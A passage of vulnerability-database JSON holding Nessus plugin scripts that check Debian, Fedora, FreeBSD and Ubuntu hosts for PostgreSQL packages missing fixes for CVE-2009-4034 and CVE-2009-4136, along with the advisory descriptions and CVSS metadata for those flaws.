(deb_check(release:\"4.0\", prefix:\"postgresql-pltcl-8.1\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-server-dev-7.4\", reference:\"7.4.27-0etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"postgresql-server-dev-8.1\", reference:\"8.1.19-0etch1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libecpg-compat3\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libecpg-dev\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libecpg6\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpgtypes3\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpq-dev\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpq5\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-8.3\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-client\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-client-8.3\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-contrib\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-contrib-8.3\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-doc\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-doc-8.3\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-plperl-8.3\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-plpython-8.3\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-pltcl-8.3\", reference:\"8.3.9-0lenny1\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"postgresql-server-dev-8.3\", reference:\"8.3.9-0lenny1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:12:50", "bulletinFamily": "scanner", "description": "Update to latest upstream point releases\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-21T00:00:00", "id": "FEDORA_2009-13381.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43340", "published": "2009-12-18T00:00:00", "title": "Fedora 12 : postgresql-8.4.2-1.fc12 (2009-13381)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-13381.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43340);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2015/10/21 22:41:46 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_bugtraq_id(37333, 37334);\n script_xref(name:\"FEDORA\", value:\"2009-13381\");\n\n script_name(english:\"Fedora 12 : postgresql-8.4.2-1.fc12 (2009-13381)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream point releases\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=546321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=547662\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032865.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?488d66ff\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:12\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^12([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 12.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC12\", reference:\"postgresql-8.4.2-1.fc12\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:12:49", "bulletinFamily": "scanner", "description": "PostgreSQL project reports :\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly handle a '\\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which (1) allows man-in-the-middle attackers to spoof arbitrary SSL-based PostgreSQL servers via a crafted server certificate issued by a legitimate Certification Authority, and (2) allows remote attackers to bypass intended client-hostname restrictions via a crafted client certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before 8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before 8.4.2 does not properly manage session-local state during execution of an index function by a database superuser, which allows remote authenticated users to gain privileges via a table with crafted index functions, as demonstrated by functions that modify (1) search_path or (2) a prepared statement, a related issue to CVE-2007-6600 and CVE-2009-3230.", "modified": "2018-11-10T00:00:00", "id": "FREEBSD_PKG_E7BC5600EAA011DEBD9C00215C6A37BB.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43177", "published": "2009-12-17T00:00:00", "title": "FreeBSD : postgresql -- multiple vulnerabilities (e7bc5600-eaa0-11de-bd9c-00215c6a37bb)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43177);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:42\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"FreeBSD : postgresql -- multiple vulnerabilities (e7bc5600-eaa0-11de-bd9c-00215c6a37bb)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PostgreSQL project reports :\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly handle a '\\0' character in a domain name in\nthe subject's Common Name (CN) field of an X.509 certificate, which\n(1) allows man-in-the-middle attackers to spoof arbitrary SSL-based\nPostgreSQL servers via a crafted server certificate issued by a\nlegitimate Certification Authority, and (2) allows remote attackers to\nbypass intended client-hostname restrictions via a crafted client\ncertificate issued by a legitimate Certification Authority, a related\nissue to CVE-2009-2408.\n\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly manage session-local state during execution of\nan index function by a database superuser, which allows remote\nauthenticated users to gain privileges via a table with crafted index\nfunctions, as demonstrated by functions that modify (1) search_path or\n(2) a prepared statement, a related issue to CVE-2007-6600 and\nCVE-2009-3230.\"\n );\n # https://vuxml.freebsd.org/freebsd/e7bc5600-eaa0-11de-bd9c-00215c6a37bb.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?54bad803\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:postgresql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-client>=7.4<7.4.27\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-client>=8.0<8.0.23\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-client>=8.1<8.1.19\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-client>=8.2<8.2.15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-client>=8.3<8.3.9\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-client>=8.4<8.4.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-server>=7.4<7.4.27\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-server>=8.0<8.0.23\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-server>=8.1<8.1.19\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-server>=8.2<8.2.15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-server>=8.3<8.3.9\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"postgresql-server>=8.4<8.4.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:12:52", "bulletinFamily": "scanner", "description": "It was discovered that PostgreSQL did not properly handle certificates with NULL characters in the Common Name field of X.509 certificates.\nAn attacker could exploit this to perform a man in the middle attack to view sensitive information or alter encrypted communications.\n(CVE-2009-4034)\n\nIt was discovered that PostgreSQL did not properly manage session-local state. A remote authenticated user could exploit this to escalate priviliges within PostgreSQL. (CVE-2009-4136).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-11-28T00:00:00", "id": "UBUNTU_USN-876-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43622", "published": "2010-01-04T00:00:00", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : postgresql-8.1, postgresql-8.3, postgresql-8.4 vulnerabilities (USN-876-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-876-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43622);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/28 22:47:45\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_bugtraq_id(37333, 37334);\n script_xref(name:\"USN\", value:\"876-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 / 9.10 : postgresql-8.1, postgresql-8.3, postgresql-8.4 vulnerabilities (USN-876-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that PostgreSQL did not properly handle certificates\nwith NULL characters in the Common Name field of X.509 certificates.\nAn attacker could exploit this to perform a man in the middle attack\nto view sensitive information or alter encrypted communications.\n(CVE-2009-4034)\n\nIt was discovered that PostgreSQL did not properly manage\nsession-local state. A remote authenticated user could exploit this to\nescalate priviliges within PostgreSQL. (CVE-2009-4136).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/876-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libecpg-compat2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libecpg-compat3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libecpg-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libecpg5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libecpg6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpgtypes2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpgtypes3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpq-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpq4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libpq5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-8.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-client-8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-client-8.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-client-8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-contrib-8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-contrib-8.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-contrib-8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-doc-8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-doc-8.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-doc-8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-plperl-8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-plperl-8.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-plperl-8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-plpython-8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-plpython-8.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-plpython-8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-pltcl-8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-pltcl-8.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-pltcl-8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-server-dev-8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-server-dev-8.3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:postgresql-server-dev-8.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2010-2018 Canonical, Inc. / NASL script (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|8\\.10|9\\.04|9\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 8.10 / 9.04 / 9.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libecpg-compat2\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libecpg-dev\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libecpg5\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpgtypes2\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpq-dev\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libpq4\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postgresql-8.1\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postgresql-client-8.1\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postgresql-contrib-8.1\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postgresql-doc-8.1\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postgresql-plperl-8.1\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postgresql-plpython-8.1\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postgresql-pltcl-8.1\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"postgresql-server-dev-8.1\", pkgver:\"8.1.19-0ubuntu0.6.06\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libecpg-compat3\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libecpg-dev\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libecpg6\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpgtypes3\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpq-dev\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"libpq5\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-8.3\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-client\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-client-8.3\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-contrib\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-contrib-8.3\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-doc\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-doc-8.3\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-plperl-8.3\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-plpython-8.3\", pkgver:\"8.3.9-0ubuntu8.04\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"postgresql-pltcl-8.3\", pkgver:\"8.3.9-0ubuntu8.04\")) 